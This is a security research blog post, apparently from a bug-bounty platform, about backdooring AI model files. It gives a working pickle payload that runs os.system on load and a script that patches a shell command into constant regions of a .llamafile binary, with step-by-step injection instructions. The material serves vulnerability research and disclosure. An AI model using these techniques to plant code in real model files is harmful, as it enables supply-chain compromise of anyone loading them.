A Technical Deep Dive: Backdooring AI Model File Formats
Introduction
As AI and machine learning models become more embedded in modern infrastructure (everything from your smart fridge to who knows what else), the files running those models are starting to look like big, flashing bullseyes for hackers. While data manipulation and bias in model outputs may get the most attention, the model files themselves, such as .llamafile, can also contain security weaknesses and nuances that hackers, researchers, and internal security teams need to be aware of.
In this blog, we’ll explore how researchers can identify and report findings in model file types, using an insightful discovery by one of our huntrs, retr0reg, as a reference. While not a vulnerability per se, it sure does shine a light on potential attack vectors lurking in these systems. Think of it as a crash course in identifying weaknesses before the bad guys beat you to it. You’re welcome.
What Makes a Good Model File Issue Report? (PSA)
When reviewing model files, such as .llamafile, it’s crucial to focus on potential risks in how these files are structured and processed. A well-documented issue report should address several key points to help developers and researchers understand the nature of the problem and its implications.
- Precisely Define the Issue: Clarity is essential. Describe the problem in terms of how the file or model could be manipulated. This could involve scenarios such as remote code execution, memory overflow, or improper validation.
- Include Reproducible Evidence: Always provide clear, step-by-step instructions or a proof of concept (PoC) that demonstrates how the issue can be replicated. Supporting this with sample code or payloads can help others verify and understand the issue better.
- Analyze the Impact: Outline the potential consequences. Could this issue result in system compromise, data leakage, or arbitrary code execution?
Model File Vulnerabilities: Keras and Pickle Deserialization Attacks
Model file vulnerabilities aren't just limited to .llamafile. Other common file formats such as Keras (used in TensorFlow) and serialized pickle files in Python can also introduce significant risks:
- Pickle Deserialization Attacks: Pickle is a Python module used for serializing and deserializing objects, but it’s dangerous if used improperly. Pickle deserialization attacks occur when untrusted data is deserialized without validation, allowing attackers to execute arbitrary code the moment the file is loaded (see the sketch after this list). This is particularly concerning in AI/ML environments where models are often serialized for sharing or storage.
- Keras Model Vulnerabilities: In some Keras implementations, there have been cases where model files lack integrity checks, leading to potential execution of malicious code. These attacks typically focus on the underlying TensorFlow framework or improper validation of model weights.
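To make the pickle risk concrete, here is a minimal sketch of the classic `__reduce__`-based payload. The class name, command, and file path are purely illustrative; the point is that simply calling `pickle.load()` on an attacker-supplied "model" file is enough to run the attacker's code.

```python
import os
import pickle


class MaliciousPayload:
    """Illustrative only: __reduce__ tells pickle to call os.system on load."""

    def __reduce__(self):
        # Whatever this returns is invoked when the pickle is deserialized.
        return (os.system, ("echo 'arbitrary code ran during model load'",))


# The attacker serializes the payload and ships it as a "model" file.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# The victim only has to load the file -- no further interaction needed.
with open("model.pkl", "rb") as f:
    pickle.load(f)  # executes the embedded os.system call
```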
Case Study: Retr0reg’s Llamafile Discovery
In one of our community’s reports, retr0reg identified a way to backdoor a .llamafile binary.
While not a complete 1:1 equivalent, you can think of this like backdooring traditional executable files (PE, ELF, etc.), a malware technique that has been known to the security community for a long time. See The Backdoor Factory and this blog for details on how this is done in traditional executables.
Discovery Overview
The .llamafile format, used to package executable LLMs (Large Language Models), supports the embedding of weights and configurations necessary to run the model across multiple platforms. By leveraging the inherent structure of the .llamafile, retr0reg found that malicious payloads could be injected into constant regions of the file without triggering typical integrity checks.
This issue arises due to the file’s reliance on APE (Actually Portable Executable), a format that packages applications into single files that can run across different platforms without modification. By manipulating specific sections of the APE structure, attackers could append harmful code that gets executed under the normal operation of the .llamafile.
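To get a feel for what "constant regions" means in practice, here is a rough sketch (not retr0reg's actual tooling) that diffs two .llamafile builds byte by byte and reports the long identical runs an attacker could target. The file names are the models mentioned later in this post; any two llamafiles will do, and both files are read fully into memory, so treat this as illustration rather than production tooling.

```python
from itertools import groupby


def constant_regions(path_a: str, path_b: str, min_len: int = 64):
    """Yield (offset, length) ranges where both files hold identical bytes."""
    a = open(path_a, "rb").read()
    b = open(path_b, "rb").read()
    same = [x == y for x, y in zip(a, b)]
    offset = 0
    for match, run in groupby(same):
        run_len = sum(1 for _ in run)
        if match and run_len >= min_len:
            yield offset, run_len
        offset += run_len


# Example file names taken from the discovery discussed below.
for off, length in constant_regions("mxbai-embed-large-v1-f16.llamafile",
                                    "llava-v1.5-7b-q4.llamafile"):
    print(f"constant region at 0x{off:x}, {length} bytes")
```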
To see the initial discovery in action and how retr0reg injected malicious payloads into the .llamafile, check out this PoC video:
Steps to Reproduce (In-Depth Breakdown)
The discovery hinges on exploiting static code segments within the .llamafile that remain constant across different versions and models. By injecting a payload into these constant regions and maintaining the file's overall integrity, retr0reg demonstrated how arbitrary code could be executed without breaking the ELF structure. Below is a more detailed, technical breakdown of the process.
- Identify Static Code Segments: Using tools like objdump or readelf, locate the constant sections of the .llamafile that are reused across versions. This may include portions of the APE (Actually Portable Executable) setup block and other data initialized on model startup. In this case, retr0reg observed strings and memory layouts that were consistent across various model files such as mxbai-embed-large-v1-f16.llamafile and llava-v1.5-7b-q4.llamafile.
- Inject Malicious Code: Modify these segments by appending a payload, such as a shell command, that will be executed during the model’s normal initialization phase. For this, retr0reg used a substitution-based injection method (using characters like && for command substitution). It’s important to note that the payload size must match the original content to maintain file integrity, especially regarding the ELF entry points.
- Maintain ELF Integrity: Ensure that the modified .llamafile maintains its ELF structure. This requires careful manipulation of the file to prevent breaking headers, sections, or other ELF components. Tools like elfedit can be used to inspect ELF headers and ensure they haven’t been corrupted during the injection process. If the ELF integrity is compromised, the model may fail to load, triggering errors such as "ELF entry point not found."
- Test in a Controlled Environment: Load the modified .llamafile in an environment where you can safely observe its execution. Upon starting the model, the injected payload should execute during the APE prep stage without disrupting the model’s normal operations. This payload can bypass many common security checks because it’s embedded within a trusted, unaltered portion of the file. A simplified sketch of the patching step follows this list.
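The injection step above boils down to an equal-length overwrite at a fixed offset. Below is a simplified sketch of that idea, not retr0reg's actual PoC: the marker string and payload are placeholders, and the only constraint it enforces is that the patch is no longer than the bytes it replaces, so every downstream ELF/APE offset stays valid. Only run something like this against a copy, in a sandboxed environment.

```python
import shutil

SOURCE = "llava-v1.5-7b-q4.llamafile"    # original, trusted binary
TARGET = "llava-backdoored.llamafile"    # patched copy to analyse in a sandbox

MARKER = b"placeholder-constant-string"  # hypothetical bytes found in a constant region
PAYLOAD = b"&& id > /tmp/pwned #"        # illustrative command-substitution payload

shutil.copyfile(SOURCE, TARGET)

with open(TARGET, "r+b") as f:
    data = f.read()
    offset = data.find(MARKER)
    if offset == -1:
        raise SystemExit("marker not found; constant region differs in this build")
    if len(PAYLOAD) > len(MARKER):
        raise SystemExit("payload is larger than the region it replaces")
    # Pad to the marker's exact length so the overall file size is unchanged
    # and the ELF/APE headers still point at the right offsets.
    patch = PAYLOAD.ljust(len(MARKER), b" ")
    f.seek(offset)
    f.write(patch)

print(f"patched {len(patch)} bytes at offset 0x{offset:x} in {TARGET}")
```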
What to Look for When Assessing Model Files
When analyzing model file formats like .llamafile for vulnerabilities, focus on the following areas:
- Improper Input Validation: One of the most common sources of vulnerabilities is improper handling of inputs. Check whether the code that loads the model file performs strict validation on values such as tensor counts, key-value pairs, or embedded scripts. An unchecked input can lead to buffer overflows, memory corruption, or even RCE, as seen in this GGUF example (a defensive parsing sketch follows this list).
- File Structure Manipulation: Many file formats, especially those supporting cross-platform execution like .llamafile, rely on specific structures (e.g., ELF or APE). Manipulating static or constant sections of these files can create exploitable entry points. Check if modifications in these regions can execute arbitrary code while maintaining file integrity.
- Memory Management: Always review how memory is allocated when loading model files. Improper bounds checking can lead to heap overflows. Memory corruption vulnerabilities in these file formats can often be exploited by manipulating the size of arrays or fields read directly from the file.
- File Parsing Flaws: Model file formats that parse large amounts of data, such as weight configurations or key-value pairs, are vulnerable to parsing flaws. In GGUF, for example, improper handling of these structures leads to heap overflows when key-value pairs exceed expected boundaries.
- Metadata Manipulation: Models often contain metadata and configurations that dictate their behavior. Tampering with these can lead to security issues.
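On the defensive side, most of the issues above come down to trusting counts and lengths read straight from the file. The sketch below shows the kind of bounds checking a loader should perform before allocating; the header layout, magic bytes, and limits are hypothetical and do not describe the real GGUF or llamafile formats.

```python
import struct

MAX_TENSORS = 1_000_000      # sanity cap; tune for the real format
MAX_KEY_LEN = 64 * 1024      # reject absurd string lengths up front


def read_header(f):
    """Parse a hypothetical model-file header with explicit bounds checks."""
    magic = f.read(4)
    if magic != b"MODL":                      # placeholder magic, not a real format
        raise ValueError("bad magic")
    tensor_count, kv_count = struct.unpack("<QQ", f.read(16))
    # Validate counts read from the file *before* using them to size allocations.
    if tensor_count > MAX_TENSORS or kv_count > MAX_TENSORS:
        raise ValueError("implausible tensor/kv count; refusing to allocate")
    metadata = {}
    for _ in range(kv_count):
        (key_len,) = struct.unpack("<Q", f.read(8))
        if key_len > MAX_KEY_LEN:
            raise ValueError("key length exceeds limit")
        key = f.read(key_len)
        if len(key) != key_len:               # truncated file or lying length field
            raise ValueError("unexpected end of file while reading key")
        metadata[key] = None                  # value parsing elided for brevity
    return tensor_count, metadata
```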
Disclosure and Mitigations
We contacted Mozilla, and the information from this report was shared with Llamafile’s lead developer. While they were impressed that our researcher was interested in diving into the APE file format, they mentioned that they did not consider this to be a vulnerability.
Conclusion
Model file formats are a crucial component of AI/ML infrastructure, and their security cannot be overlooked. By understanding and identifying potential vulnerabilities in formats like .llamafile, Keras, and serialized pickle files, researchers and hackers can help build safer, more secure AI systems.
At huntr, we encourage our community to explore these hidden vectors of attack. Whether it’s improving validation checks, implementing memory management safeguards, or finding new exploits in file structures, every contribution helps strengthen the field of AI/ML security.
Think you've got the chops to uncover the next model file vulnerability? Time to step up and prove it. Submit a model vulnerability and show us what you've got!
Stay tuned for more insights from our community, and happy hunting!